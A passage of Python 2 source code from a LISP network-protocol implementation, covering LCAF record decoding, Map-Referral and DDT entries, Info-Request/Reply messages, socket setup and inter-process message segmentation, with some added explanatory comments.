            while (lcaf_len > 0):
                packet_format = "H"
                format_size = struct.calcsize(packet_format)
                if (lcaf_len < format_size): return(None)

                packet_len = len(packet)
                afi = struct.unpack(packet_format, packet[:format_size])[0]
                afi = socket.ntohs(afi)

                if (afi == LISP_AFI_LCAF):
                    packet = self.decode_lcaf(packet, nonce, ms_json_encrypt)
                    if (packet == None): return(None)
                else:
                    packet = packet[format_size::]
                    self.rloc_name = None
                    if (afi == LISP_AFI_NAME):
                        packet, rloc_name = lisp_decode_dist_name(packet)
                        self.rloc_name = rloc_name
                    else:
                        self.rloc.afi = afi
                        packet = self.rloc.unpack_address(packet)
                        if (packet == None): return(None)
                        self.rloc.mask_len = self.rloc.host_mask_len()

                lcaf_len -= packet_len - len(packet)

        elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):

            #
            # Geo-coordinate LCAF.
            #
            geo = lisp_geo("")
            packet = geo.decode_geo(packet, lcaf_len, rsvd2)
            if (packet == None): return(None)
            self.geo = geo

        elif (lcaf_type == LISP_LCAF_JSON_TYPE):
            encrypted = rsvd2 & 0x02

            #
            # JSON LCAF, get the JSON length and string.
            #
            packet_format = "H"
            format_size = struct.calcsize(packet_format)
            if (lcaf_len < format_size): return(None)

            json_len = struct.unpack(packet_format, packet[:format_size])[0]
            json_len = socket.ntohs(json_len)
            if (lcaf_len < format_size + json_len): return(None)

            packet = packet[format_size::]
            self.json = lisp_json("", packet[0:json_len], encrypted,
                ms_json_encrypt)
            packet = packet[json_len::]

            #
            # An RLOC address follows only for telemetry JSON.
            #
            afi = socket.ntohs(struct.unpack("H", packet[:2])[0])
            packet = packet[2::]

            if (afi != 0 and lisp_is_json_telemetry(self.json.json_string)):
                self.rloc.afi = afi
                packet = self.rloc.unpack_address(packet)

        elif (lcaf_type == LISP_LCAF_ELP_TYPE):

            #
            # Explicit-locator-path LCAF.
            #
            elp = lisp_elp(None)
            elp.elp_nodes = []
            while (lcaf_len > 0):
                flags, afi = struct.unpack("HH", packet[:4])

                afi = socket.ntohs(afi)
                if (afi == LISP_AFI_LCAF): return(None)

                elp_node = lisp_elp_node()
                elp.elp_nodes.append(elp_node)

                flags = socket.ntohs(flags)
                elp_node.eid = (flags & 0x4)
                elp_node.probe = (flags & 0x2)
                elp_node.strict = (flags & 0x1)
                elp_node.address.afi = afi
                elp_node.address.mask_len = elp_node.address.host_mask_len()
                packet = elp_node.address.unpack_address(packet[4::])
                lcaf_len -= elp_node.address.addr_length() + 4

            elp.select_elp_node()
            self.elp = elp

        elif (lcaf_type == LISP_LCAF_RLE_TYPE):

            #
            # Replication-list-entry LCAF, each node may carry an optional
            # distinguished-name.
            #
            rle = lisp_rle(None)
            rle.rle_nodes = []
            while (lcaf_len > 0):
                x, rsvd, level, afi = struct.unpack("HBBH", packet[:6])

                afi = socket.ntohs(afi)
                if (afi == LISP_AFI_LCAF): return(None)

                rle_node = lisp_rle_node()
                rle.rle_nodes.append(rle_node)

                rle_node.level = level
                rle_node.address.afi = afi
                rle_node.address.mask_len = rle_node.address.host_mask_len()
                packet = rle_node.address.unpack_address(packet[6::])

                lcaf_len -= rle_node.address.addr_length() + 6
                if (lcaf_len >= 2):
                    afi = struct.unpack("H", packet[:2])[0]
                    if (socket.ntohs(afi) == LISP_AFI_NAME):
                        packet = packet[2::]
                        packet, rle_node.rloc_name = \
                            lisp_decode_dist_name(packet)

                        if (packet == None): return(None)
                        lcaf_len -= len(rle_node.rloc_name) + 1 + 2

            self.rle = rle
            self.rle.build_forwarding_list()

        elif (lcaf_type == LISP_LCAF_SECURITY_TYPE):

            #
            # Security-key LCAF. First decode the key material to learn the
            # cipher suite, then re-decode with the matching key type.
            #
            orig_packet = packet
            cipher_keys = lisp_keys(1)
            packet = cipher_keys.decode_lcaf(orig_packet, lcaf_len, False)
            if (packet == None): return(None)

            cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_CHACHA]
            if (cipher_keys.cipher_suite in cs_list):
                if (cipher_keys.cipher_suite == LISP_CS_25519_CBC):
                    key = lisp_keys(1, do_poly=False, do_chacha=False)

                if (cipher_keys.cipher_suite == LISP_CS_25519_CHACHA):
                    key = lisp_keys(1, do_poly=True, do_chacha=True)
            else:
                key = lisp_keys(1, do_poly=False, do_chacha=False)

            packet = key.decode_lcaf(orig_packet, lcaf_len, False)
            if (packet == None): return(None)

            if (len(packet) < 2): return(None)
            afi = struct.unpack("H", packet[:2])[0]
            self.rloc.afi = socket.ntohs(afi)
            if (len(packet) < self.rloc.addr_length()): return(None)
            packet = self.rloc.unpack_address(packet[2::])
            if (packet == None): return(None)
            self.rloc.mask_len = self.rloc.host_mask_len()

            if (self.rloc.is_null()): return(packet)

            rloc_name_str = self.rloc_name
            if (rloc_name_str): rloc_name_str = blue(self.rloc_name, False)

            #
            # Decide whether this is new keying state, unkeying, rekeying,
            # or a no-op that keeps the stored keys.
            #
            stored_key = self.keys[1] if self.keys else None
            if (stored_key == None):
                if (key.remote_public_key == None):
                    string = bold("No remote encap-public-key supplied",
                        False)
                    lprint(" {} for {}".format(string, rloc_name_str))
                    key = None
                else:
                    string = bold("New encap-keying with new state", False)
                    lprint(" {} for {}".format(string, rloc_name_str))
                    key.compute_shared_key("encap")

            if (stored_key):
                if (key.remote_public_key == None):
                    key = None
                    string = bold("Remote encap-unkeying occurred", False)
                    lprint(" {} for {}".format(string, rloc_name_str))
                elif (stored_key.compare_keys(key)):
                    key = stored_key
                    lprint(" Maintain stored encap-keys for {}".format(
                        rloc_name_str))
                else:
                    if (stored_key.remote_public_key == None):
                        string = "New encap-keying for existing state"
                    else:
                        string = "Remote encap-rekeying"

                    lprint(" {} for {}".format(bold(string, False),
                        rloc_name_str))
                    stored_key.remote_public_key = key.remote_public_key
                    stored_key.compute_shared_key("encap")
                    key = stored_key

            self.keys = [None, key, None, None]
        else:

            #
            # Unknown LCAF type, skip over it.
            #
            packet = packet[lcaf_len::]

        return(packet)

    def decode(self, packet, nonce, ms_json_encrypt=False):
        packet_format = "BBBBHH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        self.priority, self.weight, self.mpriority, self.mweight, flags, \
            afi = struct.unpack(packet_format, packet[:format_size])

        flags = socket.ntohs(flags)
        afi = socket.ntohs(afi)
        self.local_bit = True if (flags & 0x0004) else False
        self.probe_bit = True if (flags & 0x0002) else False
        self.reach_bit = True if (flags & 0x0001) else False

        #
        # An AFI of LISP_AFI_LCAF means the RLOC is LCAF-encoded; back up
        # over the AFI field so decode_lcaf() can reparse it.
        #
        if (afi == LISP_AFI_LCAF):
            packet = packet[format_size - 2::]
            packet = self.decode_lcaf(packet, nonce, ms_json_encrypt)
        else:
            self.rloc.afi = afi
            packet = packet[format_size::]
            packet = self.rloc.unpack_address(packet)

        self.rloc.mask_len = self.rloc.host_mask_len()
        return(packet)

    def end_of_rlocs(self, packet, rloc_count):
        for i in range(rloc_count):
            packet = self.decode(packet, None, False)
            if (packet == None): return(None)

        return(packet)
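
#
# Illustrative sketch (not in the original source): building and encoding a
# minimal RLOC-record with lisp_rloc_record and lisp_address from this file.
# The address and metric values are made-up examples.
#
# def lisp_rloc_record_example():
#     rloc_record = lisp_rloc_record()
#     rloc_record.rloc = lisp_address(LISP_AFI_IPV4, "192.0.2.1", 32, 0)
#     rloc_record.priority = 1
#     rloc_record.weight = 100
#     rloc_record.reach_bit = True
#     return(rloc_record.encode())
#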
class lisp_map_referral():
    def __init__(self):
        self.record_count = 0
        self.nonce = 0

    def print_map_referral(self):
        lprint("{} -> record-count: {}, nonce: 0x{}".format(
            bold("Map-Referral", False), self.record_count,
            lisp_hex_string(self.nonce)))

    def encode(self):
        first_long = (LISP_MAP_REFERRAL << 28) | self.record_count
        packet = struct.pack("I", socket.htonl(first_long))
        packet += struct.pack("Q", self.nonce)
        return(packet)

    def decode(self, packet):
        packet_format = "I"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        first_long = struct.unpack(packet_format, packet[:format_size])
        first_long = socket.ntohl(first_long[0])
        self.record_count = first_long & 0xff
        packet = packet[format_size::]

        packet_format = "Q"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]
        return(packet)
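
#
# Illustrative sketch (not in the original source): a Map-Referral header
# round trip using the class above. The nonce is a made-up value.
#
# def lisp_map_referral_roundtrip_example():
#     map_referral = lisp_map_referral()
#     map_referral.record_count = 1
#     map_referral.nonce = 0x1234567812345678
#     decoded = lisp_map_referral()
#     return(decoded.decode(map_referral.encode()))
#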
class lisp_ddt_entry():
    def __init__(self):
        self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.uptime = lisp_get_timestamp()
        self.delegation_set = []
        self.source_cache = None
        self.map_referrals_sent = 0

    def is_auth_prefix(self):
        if (len(self.delegation_set) != 0): return(False)
        if (self.is_star_g()): return(False)
        return(True)

    def is_ms_peer_entry(self):
        if (len(self.delegation_set) == 0): return(False)
        return(self.delegation_set[0].is_ms_peer())

    def print_referral_type(self):
        if (len(self.delegation_set) == 0): return("unknown")
        ddt_node = self.delegation_set[0]
        return(ddt_node.print_node_type())

    def print_eid_tuple(self):
        return(lisp_print_eid_tuple(self.eid, self.group))

    def add_cache(self):
        if (self.group.is_null()):
            lisp_ddt_cache.add_cache(self.eid, self)
        else:
            ddt = lisp_ddt_cache.lookup_cache(self.group, True)
            if (ddt == None):
                ddt = lisp_ddt_entry()
                ddt.eid.copy_address(self.group)
                ddt.group.copy_address(self.group)
                lisp_ddt_cache.add_cache(self.group, ddt)

            if (self.eid.is_null()): self.eid.make_default_route(ddt.group)
            ddt.add_source_entry(self)

    def add_source_entry(self, source_ddt):
        if (self.source_cache == None): self.source_cache = lisp_cache()
        self.source_cache.add_cache(source_ddt.eid, source_ddt)

    def lookup_source_cache(self, source, exact):
        if (self.source_cache == None): return(None)
        return(self.source_cache.lookup_cache(source, exact))

    def is_star_g(self):
        if (self.group.is_null()): return(False)
        return(self.eid.is_exact_match(self.group))
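
#
# Illustrative note (not in the original source): unicast entries are cached
# directly by EID, while multicast entries are keyed by group first, with
# sources stored in a per-group source-cache, so an (S,G) lookup is a group
# lookup followed by lookup_source_cache(). A minimal sketch:
#
# def lisp_ddt_entry_example(eid):
#     ddt_entry = lisp_ddt_entry()
#     ddt_entry.eid.copy_address(eid)
#     ddt_entry.add_cache()
#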
class lisp_ddt_node():
    def __init__(self):
        self.delegate_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.public_key = ""
        self.map_server_peer = False
        self.map_server_child = False
        self.priority = 0
        self.weight = 0

    def print_node_type(self):
        if (self.is_ddt_child()): return("ddt-child")
        if (self.is_ms_child()): return("map-server-child")
        if (self.is_ms_peer()): return("map-server-peer")

    def is_ddt_child(self):
        if (self.map_server_child): return(False)
        if (self.map_server_peer): return(False)
        return(True)

    def is_ms_child(self):
        return(self.map_server_child)

    def is_ms_peer(self):
        return(self.map_server_peer)
class lisp_ddt_map_request():
    def __init__(self, lisp_sockets, packet, eid, group, nonce):
        self.uptime = lisp_get_timestamp()
        self.lisp_sockets = lisp_sockets
        self.packet = packet
        self.eid = eid
        self.group = group
        self.nonce = nonce
        self.mr_source = None
        self.sport = 0
        self.itr = None
        self.retry_count = 0
        self.send_count = 0
        self.retransmit_timer = None
        self.last_request_sent_to = None
        self.from_pitr = False
        self.tried_root = False
        self.last_cached_prefix = [None, None]

    def print_ddt_map_request(self):
        lprint("Queued Map-Request from {}ITR {}->{}, nonce 0x{}".format(
            "P" if self.from_pitr else "",
            red(self.itr.print_address(), False),
            green(self.eid.print_address(), False),
            lisp_hex_string(self.nonce)))

    def queue_map_request(self):
        self.retransmit_timer = threading.Timer(
            LISP_DDT_MAP_REQUEST_INTERVAL,
            lisp_retransmit_ddt_map_request, [self])
        self.retransmit_timer.start()
        lisp_ddt_map_requestQ[str(self.nonce)] = self

    def dequeue_map_request(self):
        self.retransmit_timer.cancel()
        if (lisp_ddt_map_requestQ.has_key(str(self.nonce))):
            lisp_ddt_map_requestQ.pop(str(self.nonce))

    def print_eid_tuple(self):
        return(lisp_print_eid_tuple(self.eid, self.group))
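
#
# Illustrative note (not in the original source): queued DDT Map-Requests
# are keyed by nonce in lisp_ddt_map_requestQ so the Map-Referral path can
# find and dequeue the pending request; queue_map_request() also arms a
# one-shot timer that fires lisp_retransmit_ddt_map_request() after
# LISP_DDT_MAP_REQUEST_INTERVAL seconds if no referral arrives first.
#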
LISP_DDT_ACTION_SITE_NOT_FOUND = -2
LISP_DDT_ACTION_NULL = -1
LISP_DDT_ACTION_NODE_REFERRAL = 0
LISP_DDT_ACTION_MS_REFERRAL = 1
LISP_DDT_ACTION_MS_ACK = 2
LISP_DDT_ACTION_MS_NOT_REG = 3
LISP_DDT_ACTION_DELEGATION_HOLE = 4
LISP_DDT_ACTION_NOT_AUTH = 5
LISP_DDT_ACTION_MAX = LISP_DDT_ACTION_NOT_AUTH

lisp_map_referral_action_string = [
    "node-referral", "ms-referral", "ms-ack", "ms-not-registered",
    "delegation-hole", "not-authoritative"]
class lisp_info():
    def __init__(self):
        self.info_reply = False
        self.nonce = 0
        self.private_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.global_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.global_ms_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.ms_port = 0
        self.etr_port = 0
        self.rtr_list = []
        self.hostname = lisp_hostname

    def print_info(self):
        if (self.info_reply):
            req_or_reply = "Info-Reply"
            info_str = (", ms-port: {}, etr-port: {}, global-rloc: {}, " +
                "ms-rloc: {}, private-rloc: {}, RTR-list: ").format(
                self.ms_port, self.etr_port,
                red(self.global_etr_rloc.print_address_no_iid(), False),
                red(self.global_ms_rloc.print_address_no_iid(), False),
                red(self.private_etr_rloc.print_address_no_iid(), False))

            if (len(self.rtr_list) == 0): info_str += "empty, "
            for rtr in self.rtr_list:
                info_str += red(rtr.print_address_no_iid(), False) + ", "

            info_str = info_str[0:-2]
        else:
            req_or_reply = "Info-Request"
            hostname = "<none>" if self.hostname == None else self.hostname
            info_str = ", hostname: {}".format(blue(hostname, False))

        lprint("{} -> nonce: 0x{}{}".format(bold(req_or_reply, False),
            lisp_hex_string(self.nonce), info_str))

    def encode(self):
        first_long = (LISP_NAT_INFO << 28)
        if (self.info_reply): first_long |= (1 << 27)

        #
        # The key-id, auth-length, auth-data, TTL, and EID-prefix fields
        # are all zero in an Info message.
        #
        packet = struct.pack("I", socket.htonl(first_long))
        packet += struct.pack("Q", self.nonce)
        packet += struct.pack("III", 0, 0, 0)

        #
        # An Info-Request carries only an optional hostname, then we are
        # done.
        #
        if (self.info_reply == False):
            if (self.hostname == None):
                packet += struct.pack("H", 0)
            else:
                packet += struct.pack("H", socket.htons(LISP_AFI_NAME))
                packet += self.hostname + "\0"

            return(packet)

        #
        # This is an Info-Reply, append the NAT-traversal LCAF with the
        # port numbers, global/private RLOCs, and the RTR list.
        #
        afi = socket.htons(LISP_AFI_LCAF)
        lcaf_type = LISP_LCAF_NAT_TYPE
        lcaf_len = socket.htons(16)
        ms_port = socket.htons(self.ms_port)
        etr_port = socket.htons(self.etr_port)
        packet += struct.pack("HHBBHHHH", afi, 0, lcaf_type, 0, lcaf_len,
            ms_port, etr_port, socket.htons(self.global_etr_rloc.afi))
        packet += self.global_etr_rloc.pack_address()
        packet += struct.pack("HH", 0,
            socket.htons(self.private_etr_rloc.afi))
        packet += self.private_etr_rloc.pack_address()
        if (len(self.rtr_list) == 0): packet += struct.pack("H", 0)

        for rtr in self.rtr_list:
            packet += struct.pack("H", socket.htons(rtr.afi))
            packet += rtr.pack_address()

        return(packet)
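
    #
    # Illustrative note (not in the original source): on the wire an
    # Info-Request is the 4-byte header, an 8-byte nonce, 12 zero bytes
    # (key-id/auth-length/TTL/EID fields), and an optional AFI=name
    # hostname; an Info-Reply instead carries a NAT-traversal LCAF with
    # ms-port, etr-port, the global and private ETR RLOCs, and the RTR
    # list, which decode() below parses in the same order.
    #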

    def decode(self, packet):
        orig_packet = packet
        packet_format = "I"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        first_long = struct.unpack(packet_format, packet[:format_size])
        first_long = first_long[0]
        packet = packet[format_size::]

        packet_format = "Q"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        nonce = struct.unpack(packet_format, packet[:format_size])

        first_long = socket.ntohl(first_long)
        self.nonce = nonce[0]
        self.info_reply = first_long & 0x08000000
        self.hostname = None
        packet = packet[format_size::]

        #
        # Parse the key-id and authentication length, the latter must be
        # zero.
        #
        packet_format = "HH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        key_id, auth_len = struct.unpack(packet_format, packet[:format_size])
        if (auth_len != 0): return(None)

        packet = packet[format_size::]
        packet_format = "IBBH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        ttl, rsvd, mask_len, eid_afi = struct.unpack(packet_format,
            packet[:format_size])

        if (eid_afi != 0): return(None)
        packet = packet[format_size::]

        #
        # For an Info-Request, all that remains is an optional hostname.
        #
        if (self.info_reply == False):
            packet_format = "H"
            format_size = struct.calcsize(packet_format)
            if (len(packet) >= format_size):
                afi = struct.unpack(packet_format, packet[:format_size])[0]
                if (socket.ntohs(afi) == LISP_AFI_NAME):
                    packet = packet[format_size::]
                    packet, self.hostname = lisp_decode_dist_name(packet)

            return(orig_packet)

        #
        # This is an Info-Reply, parse the NAT-traversal LCAF header.
        #
        packet_format = "HHBBHHH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        afi, x, lcaf_type, rsvd, lcaf_len, ms_port, etr_port = \
            struct.unpack(packet_format, packet[:format_size])

        if (socket.ntohs(afi) != LISP_AFI_LCAF): return(None)

        self.ms_port = socket.ntohs(ms_port)
        self.etr_port = socket.ntohs(etr_port)
        packet = packet[format_size::]

        #
        # Parse the global ETR RLOC.
        #
        packet_format = "H"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        afi = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]
        if (afi != 0):
            self.global_etr_rloc.afi = socket.ntohs(afi)
            packet = self.global_etr_rloc.unpack_address(packet)
            if (packet == None): return(None)
            self.global_etr_rloc.mask_len = \
                self.global_etr_rloc.host_mask_len()

        #
        # Parse the global MS RLOC, returning what we have if the packet
        # ends early.
        #
        if (len(packet) < format_size): return(orig_packet)

        afi = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]
        if (afi != 0):
            self.global_ms_rloc.afi = socket.ntohs(afi)
            packet = self.global_ms_rloc.unpack_address(packet)
            if (packet == None): return(orig_packet)
            self.global_ms_rloc.mask_len = \
                self.global_ms_rloc.host_mask_len()

        #
        # Parse the private ETR RLOC.
        #
        if (len(packet) < format_size): return(orig_packet)

        afi = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]
        if (afi != 0):
            self.private_etr_rloc.afi = socket.ntohs(afi)
            packet = self.private_etr_rloc.unpack_address(packet)
            if (packet == None): return(orig_packet)
            self.private_etr_rloc.mask_len = \
                self.private_etr_rloc.host_mask_len()

        #
        # Parse the RTR list, each entry an AFI-prefixed address.
        #
        while (len(packet) >= format_size):
            afi = struct.unpack(packet_format, packet[:format_size])[0]
            packet = packet[format_size::]
            if (afi == 0): continue
            rtr = lisp_address(socket.ntohs(afi), "", 0, 0)
            packet = rtr.unpack_address(packet)
            if (packet == None): return(orig_packet)
            rtr.mask_len = rtr.host_mask_len()
            self.rtr_list.append(rtr)

        return(orig_packet)
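
#
# Illustrative note (not in the original source): decode() above returns the
# original buffer rather than the parsed-forward position, so judging from
# the returns, callers are expected to consume the Info message fields from
# the object itself rather than continue parsing the returned packet.
#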

class lisp_nat_info():
    def __init__(self, addr_str, hostname, port):
        self.address = addr_str
        self.hostname = hostname
        self.port = port
        self.uptime = lisp_get_timestamp()

    def timed_out(self):
        elapsed = time.time() - self.uptime
        return(elapsed >= (LISP_INFO_INTERVAL * 2))

class lisp_info_source():
    def __init__(self, hostname, addr_str, port):
        self.address = lisp_address(LISP_AFI_IPV4, addr_str, 32, 0)
        self.port = port
        self.uptime = lisp_get_timestamp()
        self.nonce = None
        self.hostname = hostname
        self.no_timeout = False

    def cache_address_for_info_source(self):
        key = self.address.print_address_no_iid() + self.hostname
        lisp_info_sources_by_address[key] = self

    def cache_nonce_for_info_source(self, nonce):
        self.nonce = nonce
        lisp_info_sources_by_nonce[nonce] = self
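
#
# Illustrative note (not in the original source): an Info-Request source is
# cached under two indexes, "address + hostname" and nonce, so the
# Info-Reply path can look the source up by nonce while address-based
# lookups serve NAT-traversal state. A minimal sketch with made-up values:
#
# info_source = lisp_info_source("xtr-1", "192.0.2.1", 4341)
# info_source.cache_address_for_info_source()
# info_source.cache_nonce_for_info_source(0x1234567812345678)
#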
def lisp_concat_auth_data(alg_id, auth1, auth2, auth3, auth4):

    #
    # On little-endian (x86) systems, byte-swap each unpacked word before
    # rebuilding the hex string.
    #
    if (lisp_is_x86()):
        if (auth1 != ""): auth1 = byte_swap_64(auth1)
        if (auth2 != ""): auth2 = byte_swap_64(auth2)
        if (auth3 != ""):
            if (alg_id == LISP_SHA_1_96_ALG_ID): auth3 = socket.ntohl(auth3)
            else: auth3 = byte_swap_64(auth3)
        if (auth4 != ""): auth4 = byte_swap_64(auth4)

    #
    # SHA1-96 authentication data is 20 bytes: two 8-byte words plus one
    # 4-byte word. Zero-fill each hex string to its full width.
    #
    if (alg_id == LISP_SHA_1_96_ALG_ID):
        auth1 = lisp_hex_string(auth1)
        auth1 = auth1.zfill(16)
        auth2 = lisp_hex_string(auth2)
        auth2 = auth2.zfill(16)
        auth3 = lisp_hex_string(auth3)
        auth3 = auth3.zfill(8)
        auth_data = auth1 + auth2 + auth3

    #
    # SHA2-256-128 authentication data is 32 bytes: four 8-byte words.
    #
    if (alg_id == LISP_SHA_256_128_ALG_ID):
        auth1 = lisp_hex_string(auth1)
        auth1 = auth1.zfill(16)
        auth2 = lisp_hex_string(auth2)
        auth2 = auth2.zfill(16)
        auth3 = lisp_hex_string(auth3)
        auth3 = auth3.zfill(16)
        auth4 = lisp_hex_string(auth4)
        auth4 = auth4.zfill(16)
        auth_data = auth1 + auth2 + auth3 + auth4

    return(auth_data)

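# Zero-fill sketch for the SHA1-96 branch, ignoring the x86 byte swap and
# assuming lisp_hex_string() returns bare hex digits (values hypothetical):
#
#   lisp_concat_auth_data(LISP_SHA_1_96_ALG_ID, 1, 2, 3, "")
#   => "0000000000000001" + "0000000000000002" + "00000003"
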
def lisp_open_listen_socket(local_addr, port):
    if (port.isdigit()):

        #
        # A numeric port means an AF_INET or AF_INET6 UDP socket, chosen by
        # the format of the supplied local address.
        #
        if (local_addr.find(".") != -1):
            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

        if (local_addr.find(":") != -1):
            if (lisp_is_raspbian()): return(None)
            sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)

        sock.bind((local_addr, int(port)))
    else:

        #
        # A non-numeric "port" names a unix-domain socket. Remove any stale
        # socket file before binding.
        #
        name = port
        if (os.path.exists(name)):
            os.system("rm " + name)
            time.sleep(1)

        sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
        sock.bind(name)

    return(sock)

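# Usage sketch, one call per branch above (the address and names are
# hypothetical):
#
#   udp = lisp_open_listen_socket("127.0.0.1", "4342")   # AF_INET UDP bind
#   ipc = lisp_open_listen_socket("", "lisp-itr")        # unix-domain socket
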
def lisp_open_send_socket(internal_name, afi):
    if (internal_name == ""):

        #
        # No internal name means an external UDP send socket for the
        # requested address family.
        #
        if (afi == LISP_AFI_IPV4):
            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

        if (afi == LISP_AFI_IPV6):
            if (lisp_is_raspbian()): return(None)
            sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)

    else:
        if (os.path.exists(internal_name)): os.system("rm " + internal_name)
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
        sock.bind(internal_name)

    return(sock)

def lisp_close_socket(sock, internal_name):
    sock.close()
    if (os.path.exists(internal_name)): os.system("rm " + internal_name)
    return

def lisp_is_running(node):
    return(os.path.exists(node))

def lisp_packet_ipc(packet, source, sport):
    return("packet@" + str(len(packet)) + "@" + source + "@" + str(sport) +
        "@" + packet)

def lisp_control_packet_ipc(packet, source, dest, dport):
    return("control-packet@" + dest + "@" + str(dport) + "@" + packet)

def lisp_data_packet_ipc(packet, source):
    return("data-packet@" + str(len(packet)) + "@" + source + "@@" + packet)

def lisp_command_ipc(packet, source):
    return("command@" + str(len(packet)) + "@" + source + "@@" + packet)

def lisp_api_ipc(source, data):
    return("api@" + str(len(data)) + "@" + source + "@@" + data)

def lisp_ipc(packet, send_socket, node):

    #
    # Don't queue the IPC message if the destination process is not running.
    #
    if (lisp_is_running(node) == False):
        lprint("Suppress sending IPC to {}".format(node))
        return

    #
    # Control messages are segmented at 9000 bytes; everything else is sent
    # in 1500-byte segments.
    #
    mtu = 1500 if (packet.find("control-packet") == -1) else 9000

    offset = 0
    length = len(packet)
    retry_count = 0
    sleep_time = .001
    while (length > 0):
        segment_len = min(length, mtu)
        segment = packet[offset:segment_len + offset]

        try:
            send_socket.sendto(segment, node)
            lprint("Send IPC {}-out-of-{} byte to {} succeeded".format(
                len(segment), len(packet), node))
            retry_count = 0
            sleep_time = .001

        except socket.error, e:
            if (retry_count == 12):
                lprint("Giving up on {}, consider it down".format(node))
                break

            lprint("Send IPC {}-out-of-{} byte to {} failed: {}".format(
                len(segment), len(packet), node, e))

            retry_count += 1
            time.sleep(sleep_time)

            lprint("Retrying after {} ms ...".format(sleep_time * 1000))
            sleep_time *= 2
            continue

        offset += segment_len
        length -= segment_len

    return

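# Segmentation sketch: a 4000-byte "command@..." message (mtu 1500) goes out
# as three datagrams of 1500, 1500 and 1000 bytes; a "control-packet@..."
# message of the same size fits in one 9000-byte segment. On a send failure
# the retry delay doubles from 1 ms, giving up after 12 retries.
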
def lisp_format_packet(packet):

    #
    # Hexlify the packet and insert a space after every 4 bytes (8 hex
    # digits) for display.
    #
    packet = binascii.hexlify(packet)
    offset = 0
    new_packet = ""
    length = len(packet) * 2
    while (offset < length):
        new_packet += packet[offset:offset + 8] + " "
        offset += 8
        length -= 4

    return(new_packet)

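# Display sketch (hypothetical input): an 8-byte payload is hexlified and
# broken into 8-hex-digit groups:
#
#   lisp_format_packet("\x10\x00\x00\x01\xca\xfe\xba\xbe")
#   => "10000001 cafebabe  "   (the loose loop bound leaves trailing spaces)
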
def lisp_send(lisp_sockets, dest, port, packet):
    lisp_socket = lisp_sockets[0] if dest.is_ipv4() else lisp_sockets[1]

    #
    # If the destination is an IPv4-mapped IPv6 address (::ffff:<ipv4>),
    # send on the IPv4 socket with the embedded IPv4 address. An RTR always
    # uses the IPv4 socket for such addresses.
    #
    address = dest.print_address_no_iid()
    if (address.find("::ffff:") != -1 and address.count(".") == 3):
        if (lisp_i_am_rtr): lisp_socket = lisp_sockets[0]
        if (lisp_socket == None):
            lisp_socket = lisp_sockets[0]
            address = address.split("::ffff:")[-1]

    lprint("{} {} bytes {} {}, packet: {}".format(bold("Send", False),
        len(packet), bold("to " + address, False), port,
        lisp_format_packet(packet)))

    #
    # When RLOC-probing with a TTL of 128, set the socket TTL for probe
    # Map-Requests (first byte 0x12) and probe Map-Replies (first byte
    # 0x28), and restore the default afterwards.
    #
    set_ttl = (LISP_RLOC_PROBE_TTL == 128)
    if (set_ttl):
        lisp_type = struct.unpack("B", packet[0])[0]
        set_ttl = (lisp_type in [0x12, 0x28])
        if (set_ttl): lisp_set_ttl(lisp_socket, LISP_RLOC_PROBE_TTL)

    try: lisp_socket.sendto(packet, (address, port))
    except socket.error, e:
        lprint("socket.sendto() failed: {}".format(e))

    #
    # Restore the default TTL of 64 if it was changed for an RLOC-probe.
    #
    if (set_ttl): lisp_set_ttl(lisp_socket, 64)
    return

def lisp_receive_segments(lisp_socket, packet, source, total_length):

    #
    # If the entire message fit in the first segment, we are done.
    #
    segment_len = total_length - len(packet)
    if (segment_len == 0): return([True, packet])

    lprint("Received {}-out-of-{} byte segment from {}".format(len(packet),
        total_length, source))

    #
    # Read segments until total_length bytes have been accumulated.
    #
    length = segment_len
    while (length > 0):
        try: segment = lisp_socket.recvfrom(9000)
        except: return([False, None])

        segment = segment[0]

        #
        # A new message header arriving mid-reassembly means the sender gave
        # up on the old message; discard what we have and hand it back.
        #
        if (segment.find("packet@") == 0):
            seg = segment.split("@")
            lprint(("Received new message ({}-out-of-{}) while receiving " +
                "fragments, old message discarded").format(len(segment),
                seg[1] if len(seg) > 2 else "?"))
            return([False, segment])

        length -= len(segment)
        packet += segment

        lprint("Received {}-out-of-{} byte segment from {}".format(
            len(segment), total_length, source))

    return([True, packet])

def lisp_bit_stuff(payload):

    #
    # Rejoin message fields that split() broke apart because the payload
    # itself contained "@" (0x40) bytes.
    #
    lprint("Bit-stuffing, found {} segments".format(len(payload)))
    packet = ""
    for segment in payload: packet += segment + "\x40"
    return(packet[:-1])

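# Reassembly sketch: a payload containing "@" arrives as extra split()
# fields, so the delimiter is restored between them:
#
#   lisp_bit_stuff(["abc", "def"]) => "abc\x40def"   (== "abc@def")
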
def lisp_receive(lisp_socket, internal):
    while (True):

        #
        # Read from socket. recvfrom() returns [message, (source, port)].
        #
        try: data = lisp_socket.recvfrom(9000)
        except: return(["", "", "", ""])

        #
        # External packets have no IPC header. Log and return them as-is;
        # data-plane packets are logged in truncated form.
        #
